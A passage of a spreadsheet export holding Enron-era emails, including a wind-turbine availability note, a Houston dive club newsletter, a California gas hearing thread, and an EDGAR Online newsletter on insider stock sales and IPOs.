 your order is accepted._x000D_
_x000D_
-Do not be concerned if items in your order arrive in separate_x000D_
 packages. For quicker delivery, we ship from multiple warehouses_x000D_
 throughout the country._x000D_
_x000D_
-For your protection, we do not process orders until we receive_x000D_
 authorization from your credit card company. In certain cases,_x000D_
 this may delay shipping._x000D_
_x000D_
_x000D_
Thanks again_x000D_
_x000D_
_x000D_
******************************************************************_x000D_
Please enjoy these offers from our partners:_x000D_
******************************************************************_x000D_
_x000D_
*  Get $10 Off when you shop for your home from your office._x000D_
_x000D_
    http://www.us.buy.com/clickfrom/Orderconf/netgrocer.asp_x000D_
_x000D_
_x000D_
*  ControlIT(tm) is an application for controlling remote systems._x000D_
_x000D_
    http://www.us.buy.com/clickfrom/orderconf/controlit_0630.asp</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 09:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'benjamin.bell@enron.com', 'ilan.caplan@enron.com'})</t>
  </si>
  <si>
    <t>Vestas Availability 2002</t>
  </si>
  <si>
    <t xml:space="preserve">Ilan,_x000D_
_x000D_
Here is our first attempt at a "Vestas Availability" calculation.  We did _x000D_
this for the US 1.5 fleet for each month in the year 2002._x000D_
_x000D_
There are some things you should be aware of in this calculation:_x000D_
_x000D_
1.  The Trent leaning towers are not excluded in these numbers.  We are _x000D_
working on excluding these towers but that is complicated so we won't have it _x000D_
completed today but you can expect it tomorrow._x000D_
2.  The Vestas availability number includes a portion of the repair time in _x000D_
"operational" time while the remainder is not included in the operational _x000D_
time.  We tried to emulate that by inserting a factor along with the VisuPro _x000D_
RT term.  This factor is very soft and can be changed although currently we _x000D_
have it set as .5._x000D_
_x000D_
Please take a look at the results and let me know if you have any questions _x000D_
or comments._x000D_
_x000D_
Thanks,_x000D_
Hollis_x000D_
---------------------- Forwarded by Hollis Kimbrough/EWC/Enron on 05/15/2002 _x000D_
04:25 PM ---------------------------_x000D_
_x000D_
_x000D_
Mark Fisher_x000D_
05/15/2002 03:32 PM_x000D_
To: Hollis Kimbrough/EWC/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Vestas Availability 2002_x000D_
_x000D_
Hollis,_x000D_
_x000D_
Almost always VA&gt;EA (though not always). I have not put in any kind of note _x000D_
about leaving out turbines that had resets._x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 18 Mar 2001 08:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'panacea1@swbell.net'})</t>
  </si>
  <si>
    <t>Dive Events for Houston HammerHeads</t>
  </si>
  <si>
    <t>Hi Fellow  Divers and Friends of the Houston HammerHeads,_x000D_
_x000D_
There are?seven  announcements in this email:_x000D_
?_x000D_
 _x000D_
???Monthly Socials  -?March 29, April 26, May 31_x000D_
??? You Are Invited to  Join_x000D_
?? Club Volunteers  Needed_x000D_
?? Dive In Day - May  20_x000D_
?? Local Diving at Balmorhea  State Park - May 26-28_x000D_
?? Sea Space - June 9 &amp;  10_x000D_
?? Other Events_x000D_
??? _x000D_
_x000D_
If you have any questions or  need additional information, please email._x000D_
_x000D_
Best Wishes and  Fishes,_x000D_
Kristi Foster_x000D_
King Crab  (President)_x000D_
______________________________x000D_
MONTHLY  SOCIAL_x000D_
The last Thursday of each month  (March 29, April 26 and May 31)? is the date _x000D_
of the monthly social at  Surfer's Paradise, located?across from the theater _x000D_
in the MarqE complex on  I10 off of 610 from 7:30 - 9:30 pm.? Tell the _x000D_
host/hostess you're with the  HammerHeads - we'll be in the party room.? For _x000D_
more information, please  contact Kristi Foster at panacea1@swbell.net.  _x000D_
______________________________x000D_
YOU ARE INVITED TO  JOIN_x000D_
The Houston HammerHeads has open  enrollment.? You are invited to join any _x000D_
time throughout the year.?  Annual membership dues are only $20.? In return, _x000D_
you get a club T-shirt,  stickers and decals (while supplies last) and _x000D_
continued updates on diving events  in and around Houston.? Membership forms _x000D_
are available at every social and  most other club functions.? For more _x000D_
information, please contact Kristi  Foster at panacea1@swbell.net.  _x000D_
_____________________________x000D_
VOLUNTEERS  NEEDED_x000D_
_x000D_
We need your help and participation to make this club fun!? Now that  the _x000D_
officer elections are over, we need to appoint committee chairpeople and get  _x000D_
committee members.? If you'd like to get involved, please respond to this  _x000D_
email prior to the upcoming social on March 29.? _x000D_
?_x000D_
Here's what we still need..._x000D_
Group Dive Trips - Chair is OPEN_x000D_
Other Club Events - Chair is OPEN_x000D_
In addition, we need committee members for all committees:? Guest  Speakers, _x000D_
Continuing Education, Local Dives, Environmental  Awareness,??Non-Diving _x000D_
Events, Public Relations, Communications  and?Fundraising/Sponsorship _x000D_
______________________x000D_
DIVE-IN DAY?- May  20_x000D_
3rd Annual International Dive-In Day -  It's time to make history again!_x000D_
Thousands of divers across the world will  invade beaches, rivers and lakes _x000D_
in a bold attempt to break the World Record for  the largest group dive for _x000D_
our 3rd Annual International Dive-In Day.? We  expect dives to take place in _x000D_
more than 100 locations simultaneously all over  the world, making _x000D_
International Dive in Day the World's biggest and most  significant dive _x000D_
event.? The Houston Chapter will be diving at the Blue  Lagoon (we must be in _x000D_
the water at 10:00 am to qualify for the dive!)? For  more info, contact OJ _x000D_
Strickland at sorris@hotmail.com. _x000D_
_x000D_
______________________x000D_
LOCAL  DIVING AT BALMORHEA STATE PARK - Memorial Day Weekend, May  26-28_x000D_
Balmorhea State Park is about an 8-9  hour drive from Katy, page # 7 in _x000D_
the "Texas, Dive Site Book".??  Since we're going over the long weekend, _x000D_
we?should have ample time to try  and find?Balmorhea's (2) two endangered _x000D_
fish species, the Comanche Springs  Pupfish _x000D_
and the Pecos Mosquito fish,?along with all the Mexican Tetras,  Minnows, _x000D_
Perch, Catfish, crawfish, turtles and the "bubbling sands" of the  springs._x000D_
Please RSVP?so we can calculate how things need to be arranged  _x000D_
(ride sharing, sharing big tents, food, stoves, etc.) .? We plan on  doing _x000D_
combined food cook outs, night dives and just have a ton of? FUN.  _x000D_
For more info, contact OJ Strickland at  sorris@hotmail.com.?_x000D_
_x000D_
______________________x000D_
SEA  SPACE- June 9 &amp; 10_x000D_
Houston's biggest dive expo - open to  the public.??For more information, _x000D_
check out the  website?at?www.seaspace.org.  _x000D_
______________________x000D_
OTHER  EVENTS_x000D_
The Houston HammerHeads are part of the  Texas Gulf Coast Council of Dive _x000D_
Clubs.??Here is a partial list of  diving-related activities sponsored by the _x000D_
other council member  clubs..._x000D_
Mar.  23-25?????Gulf Restoration  Network annual meeting, New Orleans, _x000D_
www.gulfrestorationnetwork.org? 504 525-1528_x000D_
Mar.31???? ???????????????  Fins UP fundraiser for Texas Marine Mammal _x000D_
Stranding Network, Galveston,  www.tmmsn.org or 800-9MAMMAL_x000D_
April 7??? ???????????????  Scubadillos San  Marcos River cleanup, _x000D_
www.divesanmarcos.com _x000D_
April 28? ???????????????  Galveston Island Scuba Club, mini-TrashFest  _x000D_
cleanup, Christi Atkinson, 409 741-1068, dcdivers@aol.com _x000D_
June  9-10????????????Texins  Underwater Safari, Lake Tenkiller, Ok. Pamela _x000D_
Stickney, 972 344-3630?p-stickney@raytheon.com_x000D_
July  21-22???????????????  Texins Hotter'n' Hell Dive,?  Possum Kingdom, Tx. _x000D_
Pamela Stickney, 972 344-3630 p-stickney@raytheon.com_x000D_
July  28-29???????????????  Nubian Canyon Lake dive and rafting trip, Lydia _x000D_
Locke 281 498-5953 or  Locke_Knest@yahoo.com_x000D_
Aug.  4-5? ???????????????  Texins Land Lubber's Luau, Lake Texoma, Tx. _x000D_
Pamela Stickney, 972 344-3630  p-stickney@raytheon.com_x000D_
Aug.  7-12?????????????????Flower Gardens, expected date for coral spawning, _x000D_
http://www.flowergarden.nos.noaa.gov/_x000D_
Aug.  16-19???????????????  BAD annual Spearfishing Contest, _x000D_
www.bayareadivers.org or 713  684-6544_x000D_
Sept.7-12?????????????????Flower Gardens, possible second spawningfor late _x000D_
bloomers, http://www.flowergarden.nos.noaa.gov/_x000D_
Sept.  15? ???????????????  HUC BAD TGCC--&amp; the whole alphabet -- picnic at _x000D_
Tom Bass Park, Robyn  Rhea, 713 792-7748, robyn@dielectrophoresis.org  _x000D_
Sept.29-Oct.1???????????????  Proposed TGCC trip to Sonnier Bank on the Sea _x000D_
Searcher II, Larry LaBorde,  281 496-4687? larry@laborde.cc _x000D_
Oct. 6???? ???????????????  Trashfest, TGCC  river cleanup in New Braunfels, _x000D_
Tx. www.tgccdiveclubs.org _x000D_
Oct.  13-14???????????????  Texins Wet Willie Wrap-up, Lake Whitney, Tx. _x000D_
Pamela Stickney, 972  344-3630 p-stickney@raytheon.com_x000D_
Oct.  20??? ???????????????  BAD Scuba Flea Market, www.bayareadivers.org or _x000D_
713  684-6544_x000D_
Nov.   ??? ???????????????  2nd annual BAD ScubaOlympics,  Williams Indoor _x000D_
Pool, www.bayareadivers.org or 713  684-6544._x000D_
_x000D_
_x000D_
?</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Commission OII Hearings</t>
  </si>
  <si>
    <t xml:space="preserve">Enron will very vigorously support the CS and I would hope that we could get _x000D_
as many people as possible to do the same.  Let's face it, California's gas _x000D_
industry is a mess for the same reasons the electricity industry is a mess _x000D_
(despite, and perhaps contrary to, the substantially more narrow reasoning _x000D_
offered by the Brattle Group).  The CS is a well-thought-out, well-designed _x000D_
program for moving forward; unlike the "interim," which takes two steps _x000D_
back.  Can we split up the names of all the people who signed on and call _x000D_
them and try to get them to show up in support? _x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Tom Beach &lt;tomb@crossborderenergy.com&gt;_x000D_
	05/14/2001 11:37 PM_x000D_
		 _x000D_
		 To: Michael.Alexander@sce.com, MDay@GMSSR.com, burkee@cts.com, _x000D_
jdasovic@enron.com, rick.counihan@greenmountain.com, paulAmirault@aec.ca_x000D_
		 cc: _x000D_
		 Subject: Re: Commission OII Hearings_x000D_
_x000D_
Watson has asked for time to speak.  I'm planning to continue to support the_x000D_
CS.  It brings some greater stability and certainty to SoCalGas' noncore_x000D_
rates.  The allocation of backbone capacity might improve shippers'_x000D_
certainty of being able to move gas through Topock and Wheeler Ridge.  In_x000D_
the short term, it's hard to say how much that might help prices, but I_x000D_
doubt that it would make them worse.  In the longer term, if new generation_x000D_
on the PG&amp;E and Kern / Mojave systems, plus the North Baja and Questar_x000D_
lines, actually reduce SoCalGas' throughput, then a SoCalGas city-gate_x000D_
market might be pretty competitive.  Finally, the CS removes SoCalGas'_x000D_
favorite argument in favor of the peaking rate._x000D_
_x000D_
So what are Edison and Enron going to do?_x000D_
_x000D_
Tom_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Michael.Alexander@sce.com&gt;_x000D_
To: &lt;MDay@GMSSR.com&gt;; &lt;burkee@cts.com&gt;; &lt;jdasovic@enron.com&gt;;_x000D_
&lt;rick.counihan@greenmountain.com&gt;; &lt;paulAmirault@aec.ca&gt;;_x000D_
&lt;tomb@crossborderenergy.com&gt;_x000D_
Sent: Monday, May 14, 2001 7:26 PM_x000D_
Subject: Commission OII Hearings_x000D_
_x000D_
_x000D_
&gt; I was just wondering what any of you guys are thinking about doing at the_x000D_
&gt; Gas OII meeting next Tuesday.  Are any of you planning on making a_x000D_
&gt; presentation?  If so, do you intend to support the settlement as filed, or_x000D_
&gt; are there modifications you think are appropriate given the way SoCalGas_x000D_
&gt; has handled its system in the past few months?_x000D_
&gt;_x000D_
&gt; Michael_x000D_
&gt;_x000D_
&gt; P.S.  FYI, I am out of town, so I am not available by phone until Monday._x000D_
&gt;_x000D_
&gt; --_x000D_
&gt; Michael S. Alexander_x000D_
&gt; Southern California Edison_x000D_
&gt; Energy Supply and Management (ES&amp;M)_x000D_
&gt; 626-302-2029_x000D_
&gt; 626-302-3254 (fax)_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Jun 2000 01:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: EDGAR Online SECrets Newsletter 6/12/00</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 06/19/2000 _x000D_
08:21 AM ---------------------------_x000D_
_x000D_
_x000D_
VKaminski@aol.com on 06/16/2000 07:53:31 PM_x000D_
To: vkamins@enron.com_x000D_
cc:  _x000D_
Subject: Fwd: EDGAR Online SECrets Newsletter 6/12/00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Return-Path: &lt;newsletter@edgar-online.com&gt;_x000D_
Received: from  rly-yc04.mx.aol.com (rly-yc04.mail.aol.com [172.18.149.36]) _x000D_
by air-yc01.mail.aol.com (v74.17) with ESMTP; Fri, 16 Jun 2000 10:30:34 -0400_x000D_
Received: from  edgar4.edgar-online.com ([209.11.14.137]) by _x000D_
rly-yc04.mx.aol.com (v74.17) with ESMTP; Fri, 16 Jun 2000 10:29:38 -0400_x000D_
Received: from edgar2.edgar-online.com ([209.10.113.102])          by _x000D_
edgar4.edgar-online.com (Post.Office MTA v3.5.3 release 223          ID# _x000D_
0-0U10L2S100V35) with SMTP id com for &lt;vkaminski@aol.com&gt;;          Fri, 16 _x000D_
Jun 2000 10:27:52 -0400_x000D_
X-Mailer: JgMail Version 1.2.3_x000D_
Date: Fri, 16 Jun 2000 07:30:46 PDT_x000D_
To: "vkaminski@aol.com" &lt;vkaminski@aol.com&gt;_x000D_
From: EDGAR Online News &lt;newsletter@edgar-online.com&gt;_x000D_
Subject: EDGAR Online SECrets Newsletter 6/12/00_x000D_
Mime-Version: 1.0_x000D_
Content-Type: text/plain; charset="us-ascii"_x000D_
Message-ID: &lt;200006161029.WNUa03496@rly-yc04.mx.aol.com&gt;_x000D_
_x000D_
****************************************_x000D_
You are receiving this newsletter because you are a_x000D_
registered user of EDGAR Online. To unsubscribe, see_x000D_
instructions at the bottom of this email._x000D_
****************************************_x000D_
EDGAR Online's SECrets Newsletter_x000D_
Editor: Tim Middleton, EDGAR Online Analyst_x000D_
editor@edgar-online.com_x000D_
_x000D_
SECrets, published every Monday, is written_x000D_
by EDGAR Online Analyst, Tim Middleton.  Tim has covered_x000D_
business and financial topics for The Wall Street Journal,_x000D_
The New York Times, Dow Jones News Service and_x000D_
Crain's New York Business.  Twice nominated for the_x000D_
Pulitzer Prize in investigative journalism, his weekly_x000D_
business reports can be heard on WCBS Radio and Microsoft_x000D_
MoneyCentral Radio._x000D_
_x000D_
/----------ADVERTISEMENT--------------------_x000D_
StockPower provides tools to help you turn your customers_x000D_
Into brand loyal, shareholding customers. Shareholding_x000D_
customers spend more, visit more and refer you more frequently._x000D_
Find out why more and more companies are tapping into_x000D_
StockPower to create brand loyalty._x000D_
_x000D_
http://www.doubleclick.net/live/stockpower/default.htm_x000D_
\--------------------------------------------/_x000D_
_x000D_
----------------------------------------_x000D_
***QUESTION OF THE WEEK***_x000D_
----------------------------------------_x000D_
QUESTION: What are "blue sky" regulations?_x000D_
_x000D_
ANSWER:  When a company goes public, it_x000D_
must file a registration statement_x000D_
with the Securities and Exchange_x000D_
Commission, which regulates the federal_x000D_
securities laws.  Also, each state has_x000D_
its own set of regulations - known as_x000D_
"blue sky laws."  Thus, before a company_x000D_
can sell stock in particular state, the_x000D_
securities must be "blue skied."  The origin_x000D_
of the phrase comes from the late 1800s,_x000D_
when a judge compared an IPO to the value_x000D_
of a section of the blue sky._x000D_
_x000D_
/------ADVERTISEMENT----------------------Purchase Business/Credit Reports _x000D_
from Dun &amp; Bradstreet_x000D_
on over 11 million U.S. businesses. Click on the_x000D_
"Resources" link when you look up SEC filings for any_x000D_
public company, or search by company name and state at_x000D_
http://www.edgar.telebase.com._x000D_
\-----------------------------------------/_x000D_
_x000D_
----------------------------------------_x000D_
***ON THE INSIDE***_x000D_
----------------------------------------_x000D_
Ariba Inc. (ARBA) helps manufacturers like DuPont and_x000D_
distributors like FedEx streamline purchasing with_x000D_
procurement software, but corporate insiders have been_x000D_
doing far more selling than buying of their company's_x000D_
stock._x000D_
_x000D_
A rash of insiders have filed Form 144 in recent days,_x000D_
weeks and months, notably co-founder and Chief Financial_x000D_
Officer Edward Kinsey. On June 6, he filed to sell 90,000_x000D_
shares valued at $5.0 million, or $55 a share, through_x000D_
Morgan Stanley Dean Witter, lead underwriter of Ariba's_x000D_
IPO one year ago. May 30 he filed to sell 100,000 shares_x000D_
for $7 million, and May 18 the Kinsey Family Foundation_x000D_
filed to sell 14,000 shares for $1.1 million._x000D_
_x000D_
Marketing vice president David Rome filed to sell 150,000_x000D_
shares for $10.5 million on May 30. Robert D. Lent, vice_x000D_
president for corporate development, filed May 24 to sell_x000D_
200,000 shares for $14.3 million._x000D_
_x000D_
The sales come long after Ariba's price peaked at $183.34_x000D_
in early March, before the Nasdaq Stock Market plunged amid_x000D_
the fallout over rising interest rates and concern about_x000D_
soaring valuations. Back then insiders, who began to sell_x000D_
immediately after the six-month lock-up on their shares_x000D_
expired, were reaping far more from their sales: Rome, for_x000D_
example, indicated in a February 1 filing he would sell_x000D_
200,000 shares for $35 million._x000D_
_x000D_
Business-to-business is regarded as the hottest of the_x000D_
Internet's hot spots, and Ariba as a leader in its niche._x000D_
The insider sales are tiny in comparison with the company's_x000D_
235.8 million outstanding shares, but they make a dent in_x000D_
the float -- more than two-thirds of Ariba's stock is owned_x000D_
by insiders and institutions._x000D_
_x000D_
Recent Ariba filings:_x000D_
_x000D_
Prakoon &amp; Emily I. Chen Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-100980_x000D_
_x000D_
Craig Federighi Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-103530_x000D_
_x000D_
Stuart R. Gold Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-102270_x000D_
_x000D_
Alan Hibdon Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-99835_x000D_
_x000D_
Velvet Higley Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-102724_x000D_
_x000D_
Joshy Joseph Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-100489_x000D_
_x000D_
Edward Kinsey Forms 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-103531_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-102418_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-99834_x000D_
_x000D_
Robert D. Lent Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-100981_x000D_
_x000D_
Ramae Ogilvie Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-102725_x000D_
_x000D_
Chester B. Petrow Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-102420_x000D_
_x000D_
David Rome Form 144_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-102419_x000D_
http://www.edgar-online.com/auth/doctrans/default.asp?doc=B-80023_x000D_
_x000D_
Form 8-K/A, March 8, 2000_x000D_
http://www.edgar-online.com/auth/edgardoc/DocFrame.pl?doc=A-1084755-0000912057_x000D_
-00-025127&amp;fmt=text&amp;nad=&amp;x=37&amp;y=17_x000D_
_x000D_
Form 10-Q, May 15, 2000_x000D_
http://www.edgar-online.com/auth/edgardoc/DocFrame.pl?doc=A-1084755-0000912057_x000D_
-00-024553&amp;fmt=text&amp;nad=&amp;x=38&amp;y=16_x000D_
_x000D_
NOTE: SEC regulations require corporate insiders -- defined_x000D_
as officers, directors and persons or entities that own 10%_x000D_
or more of any class of a company's shares -- to disclose_x000D_
sales on Form 144._x000D_
_x000D_
********************************_x000D_
----------------------------------------_x000D_
*** IPOs  ON DECK FROM IPO EXPRESS***_x000D_
----------------------------------------_x000D_
Note:  Before a company can go public_x000D_
(that is, sell shares on an exchange),_x000D_
it must file an S-1 form with the SEC._x000D_
The S-1 document, easily accessible via EDGAR Online,_x000D_
is extensive and includes such information as:_x000D_
risk factors, financials, strategy, industry trends,_x000D_
management bios, investors and more._x000D_
_x000D_
Accord Networks Ltd. of Petach-Tikva, Israel (ACCD)_x000D_
http://www.edgar-online.com/ipoexpressn/company.asp?company=4771_x000D_
_x000D_
EDGAR INSIGHT:  Accord Networks of Israel filed for an IPO on_x000D_
June 8. Accord makes and distributes the MGC-100 networking_x000D_
system enabling real-time interactive visual communications._x000D_
The system is deployed by providers and customers including_x000D_
Microsoft, Deutsche Telekom and the University of Notre Dame._x000D_
_x000D_
Victory Entertainment of Orlando, FL (VICT)_x000D_
http://www.edgar-online.com/ipoexpressn/company.asp?company=4770_x000D_
_x000D_
EDGAR INSIGHT: Victory Entertainment, which filed for an IPO_x000D_
on June 7, specializes in television and internet programming_x000D_
and corresponding merchandise.  Among its planned projects is_x000D_
NEXTBIGSTAR.com, an online talent search program hosted by Ed_x000D_
McMahon, and several dramatic and animated series._x000D_
_x000D_
Inrange Technologies Corp. of Mt. Laurel, NJ (INRG)_x000D_
http://www.edgar-online.com/ipoexpress/company.asp?ccompany=4763_x000D_
_x000D_
EDGAR INSIGHT:  Inrange Technologies creates networking and_x000D_
switching solutions for storage, data and telecommunications_x000D_
networks.  The company, which filed for an IPO on June 5, has_x000D_
installed its product at sites in more than 90 countries, and_x000D_
customers include American Express, Bell Atlantic, Cisco Systems_x000D_
and Delta Airlines._x000D_
_x000D_
WJ Communications Inc. of Palo Alto, CA (WJCI)_x000D_
http://www.edgar-online.com/ipoexpresssn/company.asp?company=4760_x000D_
_x000D_
EDGAR INSIGHT:  WJ Communications Inc. filed for an IPO on_x000D_
June 2.  The company creates innovative broadband communications_x000D_
products and has over 40 years of experience in developing radio_x000D_
frequency products.  WJCI was founded in 1957 as the_x000D_
Watkins-Johnson company, which dealt in defense and space_x000D_
communications systems._x000D_
_x000D_
First Shares Bancorp Inc. of Greenwood, IN (FRSH)_x000D_
http://www.edgar-online.com/ipoexpressn/company.asp?company=4327_x000D_
_x000D_
EDGAR INSIGHT:  First Shares Bancorp Inc. announced June 6 that_x000D_
it is priced for trading at $8.50 per share for up to 750,000_x000D_
shares and trading will commence the week of June 19.  The company_x000D_
owns all common shares of the First Bank of Indiana._x000D_
_x000D_
Charles River Laboratories Corp. of Wilmington, MA (CRL)_x000D_
http://www.edgar-online.com/ipoexpressn/company.asp?company=4611_x000D_
_x000D_
EDGAR INSIGHT:  Charles River Laboratories filed a June 6_x000D_
pricing of $15-$17 per share for 12.5 million shares.  The_x000D_
company, which provides research tools and support services,_x000D_
plans to use IPO proceeds to pay off debt._x000D_
_x000D_
Cooperative Holdings Inc. of Belleville, NJ (CCII)_x000D_
http://www.edgar-online.com/ipoexpressn/company.asp?company=4538_x000D_
_x000D_
EDGAR INSIGHT:  Cooperative Holdings was priced on June 5 at_x000D_
$9-$11 a share for 6 million shares.  The company provides_x000D_
telecommunications services and DSL to New Jersey and looks_x000D_
to expand to the Mid-Atlantic market.  It currently has more_x000D_
than 7,500 small business customers._x000D_
_x000D_
/----------ADVERTISEMENT--------------------Subscribe to IPO Express and you _x000D_
can receive company_x000D_
reports, Daily wrap-ups and Weekly summaries of the IPO_x000D_
market sent direct to your desktop._x000D_
_x000D_
Go to http://www.ipo-express.com.com_x000D_
for more information._x000D_
\-------------------------------------------/_x000D_
---------------------------------------_x000D_
**RECENT IPOs FROM IPO EXPRESS**_x000D_
----------------------------------------_x000D_
_x000D_
UbiquiTel Inc. of Bala Cynwyd, PA (UPCS)_x000D_
http://www.edgar-online.com/ipoexpressn/company.asp?company=4382_x000D_
_x000D_
EDGAR INSIGHT:  UbiquiTel, which began trading on June 7, is_x000D_
the exclusive provider of Sprint PCS services to approximately_x000D_
7.7 million people in small western and Midwestern U.S. markets._x000D_
It was priced June 7, 2000, at $8 per share for 12.5 million_x000D_
shares. The company had originally planned to release 14.5_x000D_
million shares._x000D_
_x000D_
Founders Food &amp; Firkins Ltd. of St. Louis Park, MN (GCFB)_x000D_
http://www.edgar-online.com/ipoexpressn/company.asp?company=4084_x000D_
_x000D_
EDGAR INSIGHT:  Founders Food &amp; Firkins Ltd. began trading_x000D_
June 7 at $4.13 per share for one million shares.  The company_x000D_
operates the Granite City Food &amp; Brewery Restaurant in St. Cloud,_x000D_
Minnesota, and hopes to use IPO funds to fund two additional_x000D_
restaurants in North and South Dakota._x000D_
_x000D_
Exult Inc. of Irvine, CA (EXLT)_x000D_
http://www.edgar-online.com/ipoexpressn/company.asp?company=4340_x000D_
_x000D_
EDGAR INSIGHT:  Exult Inc. began trading on June 2, at $10 per_x000D_
share for 6 million shares.  The company's eHR service is designed_x000D_
to manage the human resource departments for Global 500 companies._x000D_
The company, which was originally called BPO-US, plans to use_x000D_
the IPO proceeds to fund corporate expenses and as working_x000D_
capital._x000D_
_x000D_
To view all recent IPO filings:_x000D_
http://www.edgar-online.com/ipoexpress/recent.htm_x000D_
_x000D_
To access over 2,500 IPO  Filings and_x000D_
Information on over 1,500_x000D_
Underwriters, click over to EDGAR_x000D_
Online's IPOExpress:_x000D_
_x000D_
http://www.edgar-online.com/ipoexpress_x000D_
----------------------------------------_x000D_
}**COMPANIES MENTIONED IN THIS ISSUE***_x000D_
Accord Networks Ltd_x000D_
American Airlines_x000D_
Ariba Inc_x000D_
Bell Atlantic_x000D_
Charles River Laboratories Corp_x000D_
Cisco Systems_x000D_
Cooperative Holdings Inc_x000D_
Delta Airlines_x000D_
Deutsche Telekom_x000D_
DuPont_x000D_
Exult Inc_x000D_
FedEx_x000D_
First Banc of Indiana_x000D_
First Shares Bancorp Inc_x000D_
Founders Food &amp; Firkins Ltd_x000D_
Inrange Technology Corp_x000D_
Microsoft_x000D_
Morgan Stanley Dean Witter_x000D_
UbiquiTel Inc_x000D_
University of Notre Dame_x000D_
Victory Entertainment_x000D_
WJ Communications Inc_x000D_
_x000D_
----------------------------------------_x000D_
**PEOPLE MENTIONED IN THIS ISSUE***_x000D_
----------------------------------------_x000D_
Prakoon &amp; Emily I. Chen_x000D_
Craig Federighi_x000D_
Stuart R. Gold_x000D_
Alan Hibdon_x000D_
Velvet Higley_x000D_
Joshy Joseph_x000D_
Edward Kinsey_x000D_
Kinsey Family Foundation_x000D_
Robert D. Lent_x000D_
Ed McMahon_x000D_
David Rome_x000D_
_x000D_
 ----------------------------------------_x000D_
Copyright 2000, EDGAR Online_x000D_
http://www.edgar-online.com_x000D_
-----------------------------------------_x000D_
_x000D_
DISCLAIMER: The EDGAR Online report_x000D_
contains observations of its editor_x000D_
Tim Middleton, a consultant of EDGAR_x000D_
Online and is for informational purposes_x000D_
only.  These statements and expressions_x000D_
are the sole opinions of Mr. Middleton and_x000D_
EDGAR Online does not endorse nor_x000D_
necessarily agree on such statements_x000D_
and expressions.  Factual statements in_x000D_
this report are made as of the date_x000D_
stated and are subject to change_x000D_
without notice.  Nothing contained_x000D_
herein shall be deemed to be_x000D_
recommendations to buy, hold or sell_x000D_
securities nor shall it purport to be a_x000D_
complete analysis of the companies_x000D_
mentioned.  While the information_x000D_
contained in this Report and the opinions_x000D_
contained herein are based on_x000D_
sources believed to be reliable,_x000D_
neither Mr. Middleton nor EDGAR Online_x000D_
have  independently verified the facts,_x000D_
assumptions and/or estimates that may_x000D_
be contained in this Report. Accordingly, no_x000D_
representation or warranty, expressed or implied,_x000D_
is made as to, and no reliance should be placed_x000D_
on, the fairness, accuracy, completeness or_x000D_
correctness of the information and opinions_x000D_
contained in this Report._x000D_
_x000D_
****************************************_x000D_
To unsubscribe from the SECrets Newsletter,_x000D_
go to http://www.edgar-online.com/auth/updateinfo.asp_x000D_
and deselect the free newsletter option._x000D_
If you need your user name or password, go to_x000D_
http://www.edgar-online.com/username.asp._x000D_
For help, contact support@edgar-online.com._x000D_
****************************************_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 08:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rick.buy@enron.com', 'richard.causey@enron.com', 'mark.koenig@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Enron and The New Economy Value Research Lab</t>
  </si>
  <si>
    <t xml:space="preserve">Gentlemen:_x000D_
_x000D_
Enron is exploring the possibility of becoming involved in a research _x000D_
endeavor called the New Economy Value Research Lab. The Lab is the result of _x000D_
a joint effort between MIT's Sloan School of Management and Arthur Andersen _x000D_
(AA). Its purpose is to develop "quantitative valuations of the intangible _x000D_
assets Wall Street finds increasingly important in the New Economy" (Business _x000D_
Week, 2/7/00). Clearly, as Enron continues to shift from a hard asset to _x000D_
intangible asset based organization, the question of "how to" accurately and _x000D_
appropriate measure and value our intangible assets is becoming increasingly _x000D_
important._x000D_
_x000D_
Last week, Steve Kean, Vince Kaminski, Marie Hejka, and myself met with a _x000D_
team from AA, the Deputy Dean of the Sloan School, and MIT's lead _x000D_
accounting/finance professor to discuss the intent of the Lab, expected _x000D_
outcomes, and how Enron may be involved. Post that meeting, the decision was _x000D_
made to continue to explore participation in the Lab. Enron now needs to 1) _x000D_
define our corporate measurement and valuation process needs, and 2) identify _x000D_
value attributes important to Enron and the industries in which we operate. _x000D_
Once defined, a follow up meeting will be held with MIT and next steps will _x000D_
be determined._x000D_
_x000D_
Your expertise and assistance could significantly impact the inputs and _x000D_
outcomes of these next steps. Please schedule time on Tuesday August 1 from  _x000D_
2:00 to 3:30 to attend the next meeting, during which we will begin to _x000D_
identify needs and define value attributes. Location will be EB 49c4. Please _x000D_
notify me if you are unable to attend._x000D_
_x000D_
Lastly, to assist with preparation for this meeting, I am attaching notes _x000D_
from a recently published book entitled  Cracking the Value Code: How _x000D_
